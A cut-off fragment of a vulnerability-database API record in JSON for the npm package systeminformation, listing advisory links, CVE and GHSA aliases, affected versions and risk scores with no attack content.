"https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-wphj-fx3q-84ch" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/73014?format=api", "purl": "pkg:npm/systeminformation@5.27.14", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2rnv-d3tb-hug9" }, { "vulnerability": "VCID-kg9c-n3a4-9uh1" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.27.14" } ], "aliases": [ "CVE-2025-68154", "GHSA-wphj-fx3q-84ch" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wd8e-yyex-vqff" } ], 
"fixing_vulnerabilities": [], "risk_score": null, "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/systeminformation@5.11.15" }